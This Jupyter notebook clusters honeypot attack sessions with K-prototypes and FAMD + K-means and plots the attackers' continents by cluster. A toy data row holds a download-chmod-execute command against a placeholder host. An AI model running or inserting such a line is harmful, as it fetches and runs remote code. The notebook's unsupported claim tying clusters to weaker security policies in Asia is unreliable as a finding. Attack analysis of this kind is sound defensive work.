# Second Clustering Stage
This notebook contains the code for the second clustering stage. Here we further classify the data in clusters 1 and 2 produced by the first stage. We extract features from the data and cluster them using K-prototypes and FAMD + K-means.

In [None]:
# Required imports 

# Utils functions
from utils import *

# Ignore warnings
import warnings
warnings.filterwarnings('ignore')

# General imports 
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from tqdm import tqdm
from collections import Counter

# ML imports
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import MinMaxScaler
from kmodes.kprototypes import KPrototypes
from sklearn.cluster import KMeans

# Dimensionality reduction 
import prince

# Feature extraction

Let us extract numerical and categorical data.  Then, we'll experiment with various clustering algorithms. Features we consider are:
+ Attack duration in seconds
+ Length and number of commands entered by the attacker
+ Boolean variable showing whether a link is downloaded by the attacker
+ Boolean variable showing whether chmod is used by the attacker
+ Length of password
+ Protocol variable
+ Host port and Peer port
+ Protocol version (not useful: there is more telnet than SSH, and the version is only available for telnet)
+ Attacker location
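As a rough illustration of how features like these could be derived, the sketch below builds a few of them with pandas. The raw column names (`start_time`, `end_time`, `commands`, `password`), the toy rows, and the helper `sketch_features` are assumptions made for this example; the notebook's actual logic lives in `feature_extraction` from `utils` and may differ.

```python
import pandas as pd

# Hypothetical raw sessions; column names and values are illustrative only
sessions = pd.DataFrame({
    "start_time": pd.to_datetime(["2023-01-01 10:00:00", "2023-01-01 11:00:00"]),
    "end_time": pd.to_datetime(["2023-01-01 10:00:42", "2023-01-01 11:03:00"]),
    "commands": ["wget http://example.com/x.sh; chmod +x x.sh; ./x.sh", "uname -a"],
    "password": ["admin", "123456789"],
})

def sketch_features(raw):
    """Derive a few numerical and boolean features from raw session fields."""
    out = pd.DataFrame(index=raw.index)
    # Attack duration in seconds
    out["attack_duration"] = (raw["end_time"] - raw["start_time"]).dt.total_seconds()
    # Character length and whitespace-separated token count of the command string
    out["length_command"] = raw["commands"].str.len()
    out["wcount_command"] = raw["commands"].str.split().str.len()
    # Boolean flags: a URL appears in the commands, chmod appears in the commands
    out["link_download"] = raw["commands"].str.contains(r"https?://", regex=True)
    out["chmod_found"] = raw["commands"].str.contains("chmod", regex=False)
    # Password length
    out["length_password"] = raw["password"].str.len()
    return out

features = sketch_features(sessions)
print(features)
```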

Clusters 1 and 2 contain the vast majority of the attacks made via telnet: of 183,037 telnet attacks in total, 182,891 fall in cluster 1 or cluster 2. This suggests that the more threatening attacks are performed over telnet.

In [None]:
# Read csv file
df = pd.read_csv("../Data/Cluster_data_wlabels.csv")

# Consider data just in cluster 1 and 2
df = df[df['spectral_cluster'].isin([1, 2])]

# Command normalization
df = command_normalization(df)

# Feature extraction
df_features = feature_extraction(df)

# Divide the data in two dataframes, one for each cluster
df_features1 = df_features[df_features['spectral_clustering'] == 1]
df_features2 = df_features[df_features['spectral_clustering'] == 2]
df_features1 = df_features1.drop(['spectral_clustering'], axis =1)
df_features2 = df_features2.drop(['spectral_clustering'], axis =1)

## Feature correlation
Plot the correlation matrix for every dataframe to observe correlated features.
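Besides reading the heatmap, correlated features can be listed programmatically. The sketch below is a minimal example under assumptions: the helper `correlated_pairs`, the 0.9 threshold, and the toy values are illustrative and are not part of `utils`.

```python
import pandas as pd

def correlated_pairs(df, threshold=0.9):
    """Return (col_a, col_b, r) for numeric column pairs with |r| >= threshold."""
    corr = df.select_dtypes(include="number").corr()
    cols = corr.columns
    pairs = []
    # Visit only the upper triangle so each pair is reported once
    for i in range(len(cols)):
        for j in range(i + 1, len(cols)):
            r = corr.iloc[i, j]
            if abs(r) >= threshold:
                pairs.append((cols[i], cols[j], float(r)))
    return pairs

# Toy data: wcount_command is an exact multiple of length_command
toy = pd.DataFrame({
    "length_command": [10, 20, 30, 40, 50],
    "wcount_command": [2, 4, 6, 8, 10],
    "length_password": [5, 9, 4, 8, 6],
})
pairs = correlated_pairs(toy)
print(pairs)
```

One feature from each reported pair is then a candidate for dropping.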

In [None]:
# Correlation matrix for features from the first cluster
plot_corr_mat(df_features1)

# Correlation matrix for features from the second cluster
plot_corr_mat(df_features2)

In [None]:
# Drop correlated features
df_features1 = df_features1.drop(['host_port','length_command','peer_port'], axis = 1)
df_features2 = df_features2.drop(['host_port','length_command','peer_port'], axis = 1)

# Clustering data in the first group (Intermediate threat)

## K-prototypes

In [None]:
# Scale the numerical data
scaler = MinMaxScaler()
df_features1_scaled = df_features1.copy()
df_features1_scaled[['attack_duration','wcount_command','length_password']] = scaler.fit_transform(df_features1_scaled.drop(['link_download','chmod_found', 'protocol','continent_attacker'], axis=1))

n_clusters selection using elbow plot
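To make the cost tracked in the elbow plot more concrete: in Huang's K-prototypes formulation, the dissimilarity between a point and a prototype is the squared Euclidean distance on the numerical features plus `gamma` times the number of mismatching categorical features. The sketch below computes this for one point; the function name and toy values are illustrative and do not reproduce the `kmodes` internals.

```python
import numpy as np

def mixed_dissimilarity(x_num, x_cat, proto_num, proto_cat, gamma):
    """Squared Euclidean distance on numerical parts plus gamma * categorical mismatches."""
    x_num = np.asarray(x_num, dtype=float)
    proto_num = np.asarray(proto_num, dtype=float)
    num_part = float(np.sum((x_num - proto_num) ** 2))
    cat_part = int(np.sum(np.asarray(x_cat) != np.asarray(proto_cat)))
    return num_part + gamma * cat_part

# Toy point and prototype: three scaled numerical values, four categorical values
d = mixed_dissimilarity(
    x_num=[0.2, 0.5, 0.1],
    x_cat=["yes", "no", "telnet", "AS"],
    proto_num=[0.0, 0.5, 0.3],
    proto_cat=["yes", "yes", "telnet", "EU"],
    gamma=0.5,  # assumed weight for this example
)
print(d)
```

A larger `gamma` gives the categorical features more weight relative to the numerical ones, which is why the numerical columns are scaled beforehand.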

In [None]:
#Elbow plot with cost 
costs = []
categorical_columns = [2,3,5,6]

for k in tqdm(range(2, 10)):
    kproto = KPrototypes(n_clusters=k, init='Huang', gamma=None, n_init=1, random_state=42)
    kproto.fit(df_features1_scaled, categorical=categorical_columns)
    costs.append(kproto.cost_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(2 , 10) , costs , 'o')
plt.plot(np.arange(2 , 10) , costs , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Distortion')
plt.title('Elbow Plot')
plt.show()

3 clusters seem a good choice based on the elbow plot.
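Reading the elbow by eye can be complemented with a simple numeric heuristic. The sketch below picks the k with the largest second difference of the cost curve; the helper name and the cost values are made up for illustration and are not results from this notebook.

```python
import numpy as np

def elbow_by_second_difference(ks, costs):
    """Return the k where the cost curve bends the most (largest second difference)."""
    ks = np.asarray(ks)
    costs = np.asarray(costs, dtype=float)
    # Discrete second derivative, defined only for interior points
    second_diff = costs[:-2] - 2 * costs[1:-1] + costs[2:]
    return int(ks[1:-1][np.argmax(second_diff)])

toy_ks = list(range(2, 8))
toy_costs = [100.0, 60.0, 30.0, 25.0, 22.0, 20.0]  # invented values
elbow_k = elbow_by_second_difference(toy_ks, toy_costs)
print(elbow_k)
```

This heuristic is sensitive to noise in the curve, so it is best treated as a sanity check on the visual choice rather than a replacement for it.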

In [None]:
# Fit and predict for k = 3
kproto = KPrototypes(n_clusters=3, init='Huang', gamma=None, n_init=1, random_state=42)
clusters_kproto1 = kproto.fit_predict(df_features1_scaled, categorical=categorical_columns)

# Append the clusters to the dataset
df_features1['kproto_cluster'] = clusters_kproto1

### K-prototypes visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kproto1)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# Multiple plots, clustering visualization
cluster_visualization(df_features1,'kproto_cluster')

In [None]:
# Continent count per cluster
grouped = df_features1.groupby(['kproto_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

We can observe that cluster 1 is dominated by EU, while clusters 0 and 2 are dominated by Asia. Examining the previous plots, one notices that cluster 1 has the shortest attack duration and does not download and execute as many files as cluster 0, so within this intermediate level it is the least threatening group. This is possibly due to weaker cybersecurity policies in Asia, which would leave attackers there the permissions needed to download and execute what they want without any regulation.

## FAMD & K-means

In [None]:
# No scaling is needed here; FAMD handles it internally
# Look for optimal n_components (Scree plot)
famd = prince.FAMD(n_components=(len(df_features1.columns) - 1), n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features1.drop(['kproto_cluster'],axis=1))

# Scree plot
eigenvalues = famd.eigenvalues_
plt.figure(1 , figsize = (15 ,6))
plt.plot(range(1, len(eigenvalues) + 1), eigenvalues, marker='o')
plt.plot(range(1, len(eigenvalues) + 1) , eigenvalues , '-' , alpha = 0.5)
plt.title("Scree Plot")
plt.xlabel("Number of Components")
plt.ylabel("Eigenvalues")
plt.show()

Let us keep components until we reach 75% of the total variance.
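The rule can be sketched on its own with NumPy: normalize the eigenvalues, accumulate them, and take the first component count whose cumulative share reaches the target. The helper name and the toy eigenvalues below are assumptions for illustration, not values from this dataset.

```python
import numpy as np

def components_for_variance(eigenvalues, target=0.75):
    """Smallest number of leading components whose cumulative variance share >= target."""
    eigenvalues = np.asarray(eigenvalues, dtype=float)
    cumulative = np.cumsum(eigenvalues / eigenvalues.sum())
    # argmax returns the first index where the condition holds
    n_keep = int(np.argmax(cumulative >= target) + 1)
    return n_keep, cumulative

toy_eigenvalues = [4.0, 2.0, 2.0, 1.0, 1.0]  # invented values
n_keep, cumulative = components_for_variance(toy_eigenvalues)
print(n_keep, cumulative)
```

With these toy eigenvalues the cumulative shares are 0.4, 0.6, 0.8, 0.9 and 1.0, so three components are the first to pass the 75% mark.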

In [None]:
cumulative_variance = np.cumsum(famd.eigenvalues_ / sum(famd.eigenvalues_))
n_components = np.argmax(cumulative_variance >= 0.75) + 1
print('Optimal number of components using the 3/4 rule:',n_components)
print('Fitting FAMD with n_components = 5....')
# Fit FAMD for n_components = 5
famd = prince.FAMD(n_components=5, n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features1.drop(['kproto_cluster'],axis=1))
df_features1_famdkmeans = famd.row_coordinates(df_features1.drop(['kproto_cluster'],axis=1))

Now we can apply K-means clustering to this data.

In [None]:
# Scaling the data
scaler = MinMaxScaler(feature_range=(-1,1)) # since we have negative and positive values
df_features1_famdkmeans_scaled = scaler.fit_transform(df_features1_famdkmeans)
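For reference, min-max scaling to a range [low, high] maps each column linearly so that its minimum lands on low and its maximum on high. The NumPy sketch below mirrors that idea under assumptions: the function name and toy matrix are illustrative, and constant columns are mapped to low.

```python
import numpy as np

def minmax_scale(X, low=-1.0, high=1.0):
    """Linearly rescale each column of X to the interval [low, high]."""
    X = np.asarray(X, dtype=float)
    col_min = X.min(axis=0)
    col_max = X.max(axis=0)
    # Avoid division by zero for constant columns
    span = np.where(col_max > col_min, col_max - col_min, 1.0)
    return low + (X - col_min) / span * (high - low)

# Toy coordinates with negative and positive values
toy_coords = np.array([[-2.0, 10.0],
                       [0.0, 20.0],
                       [2.0, 40.0]])
scaled = minmax_scale(toy_coords)
print(scaled)
```

Because K-means relies on Euclidean distance, putting all components on the same range keeps any single component from dominating the distance purely because of its scale.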

Choose the optimal number of clusters for K-means using the elbow plot again.

In [None]:
# Choosing the number of clusters for k-means
inertia = []
for k in tqdm(range(1, 10)):
    km = KMeans(n_clusters = k ,init='k-means++',  random_state= 42  , algorithm='elkan')
    km.fit(df_features1_famdkmeans_scaled )
    inertia.append(km.inertia_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(1 , 10) , inertia , 'o')
plt.plot(np.arange(1 , 10) , inertia , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Inertia')
plt.show()

2 or 3 could be a reasonable choice in this case. Let us choose 3 to stay consistent with the previous method and allow a better comparison.

In [None]:
# Fit again for k=3
km = KMeans(n_clusters = 3 ,init='k-means++',  random_state= 42  , algorithm='elkan')
km.fit(df_features1_famdkmeans_scaled)
clusters_kmeans1 = km.labels_
# Append cluster labels to the dataframe
df_features1['kmeans_cluster'] = clusters_kmeans1

### FAMD & K-means visualization

In [None]:
# Clustering distribution for K-means
label_counts = Counter(clusters_kmeans1)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
cluster_visualization(df_features1,'kmeans_cluster')

In [None]:
# Continent count per cluster
grouped = df_features1.groupby(['kmeans_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Worse results than K-prototypes.
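One way to inspect how the two label sets relate is a contingency table of K-prototypes labels against K-means labels. The sketch below uses invented labels in a toy dataframe; only the column names `kproto_cluster` and `kmeans_cluster` come from this notebook.

```python
import pandas as pd

# Toy labels, invented for illustration
toy = pd.DataFrame({
    "kproto_cluster": [0, 0, 1, 1, 2, 2, 2],
    "kmeans_cluster": [1, 1, 0, 0, 2, 2, 0],
})

# Rows: K-prototypes clusters; columns: K-means clusters; cells: number of shared points
agreement = pd.crosstab(toy["kproto_cluster"], toy["kmeans_cluster"])
print(agreement)
```

Cluster ids are arbitrary in both methods, so agreement shows up as one dominant cell per row rather than as a diagonal.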

# Clustering data in the second group (High threat)

## K-prototypes

In [None]:
# Scale the numerical data
scaler = MinMaxScaler()
df_features2_scaled = df_features2.copy()
df_features2_scaled[['attack_duration','wcount_command','length_password']] = scaler.fit_transform(df_features2_scaled.drop(['link_download','chmod_found', 'protocol','continent_attacker'], axis=1))

n_clusters selection using elbow plot

In [None]:
#Elbow plot with cost 
costs = []
categorical_columns = [2,3,5,6]

for k in tqdm(range(2, 10)):
    kproto = KPrototypes(n_clusters=k, init='Huang', gamma=None, n_init=1, random_state=42)
    kproto.fit(df_features2_scaled, categorical=categorical_columns)
    costs.append(kproto.cost_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(2 , 10) , costs , 'o')
plt.plot(np.arange(2 , 10) , costs , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Distortion')
plt.title('Elbow Plot')
plt.show()

4 clusters seem a good choice based on the elbow plot.

In [None]:
# Fit and predict for k = 4
kproto = KPrototypes(n_clusters=4, init='Huang', gamma=None, n_init=1, random_state=42)
clusters_kproto2 = kproto.fit_predict(df_features2_scaled, categorical=categorical_columns)

# Append the clusters to the dataset
df_features2['kproto_cluster'] = clusters_kproto2

### K-prototypes visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kproto2)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the cluster numbers (k = 4)
ax.set_xticks([0, 1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# Multiple plots, clustering visualization
cluster_visualization(df_features2,'kproto_cluster')

In [None]:
# Continent count per cluster
grouped = df_features2.groupby(['kproto_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Four different clusters are created at this high threat level. Observe that cluster 3, the biggest cluster and mainly dominated by EU, has the shortest attack duration and is also the one that downloads the most files, but without executing them. Again, within this high threat level, this is the least threatening group compared with the others, in which files are downloaded and executed with permissions.

## FAMD & K-means

In [None]:
# No scaling is needed here; FAMD handles it internally
# Look for optimal n_components (Scree plot)
famd = prince.FAMD(n_components=(len(df_features2.columns) - 1), n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features2.drop(['kproto_cluster'],axis=1))

# Scree plot
eigenvalues = famd.eigenvalues_
plt.figure(1 , figsize = (15 ,6))
plt.plot(range(1, len(eigenvalues) + 1), eigenvalues, marker='o')
plt.plot(range(1, len(eigenvalues) + 1) , eigenvalues , '-' , alpha = 0.5)
plt.title("Scree Plot")
plt.xlabel("Number of Components")
plt.ylabel("Eigenvalues")
plt.show()

Let us keep components until we reach 75% of the total variance.

In [None]:
cumulative_variance = np.cumsum(famd.eigenvalues_ / sum(famd.eigenvalues_))
n_components = np.argmax(cumulative_variance >= 0.75) + 1
print('Optimal number of components using the 3/4 rule:',n_components)
print('Fitting FAMD with n_components = 5....')
# Fit FAMD for n_components = 5
famd = prince.FAMD(n_components=5, n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features2.drop(['kproto_cluster'],axis=1))
df_features2_famdkmeans = famd.row_coordinates(df_features2.drop(['kproto_cluster'],axis=1))

Now we can apply K-means clustering to this data.

In [None]:
# Scaling the data
scaler = MinMaxScaler(feature_range=(-1,1)) # since we have negative and positive values
df_features2_famdkmeans_scaled = scaler.fit_transform(df_features2_famdkmeans)

Choose the optimal number of clusters using the elbow plot

In [None]:
# Choosing the number of clusters for k-means
inertia = []
for k in tqdm(range(1, 10)):
    km = KMeans(n_clusters = k ,init='k-means++',  random_state= 42  , algorithm='elkan')
    km.fit(df_features2_famdkmeans_scaled )
    inertia.append(km.inertia_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(1 , 10) , inertia , 'o')
plt.plot(np.arange(1 , 10) , inertia , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Inertia')
plt.show()

2 or 3 could be a reasonable choice in this case. Let us choose 4 to stay consistent with the previous method and allow a better comparison.

In [None]:
# Fit again for k=4
km = KMeans(n_clusters = 4 ,init='k-means++',  random_state= 42  , algorithm='elkan')
km.fit(df_features2_famdkmeans_scaled)
clusters_kmeans2 = km.labels_
# Append cluster labels to the dataframe
df_features2['kmeans_cluster'] = clusters_kmeans2

### FAMD & K-means visualization

In [None]:
# Clustering distribution for K-means
label_counts = Counter(clusters_kmeans2)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
cluster_visualization(df_features2,'kmeans_cluster')

In [None]:
# Continent count per cluster
grouped = df_features2.groupby(['kmeans_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Worse results than K-prototypes.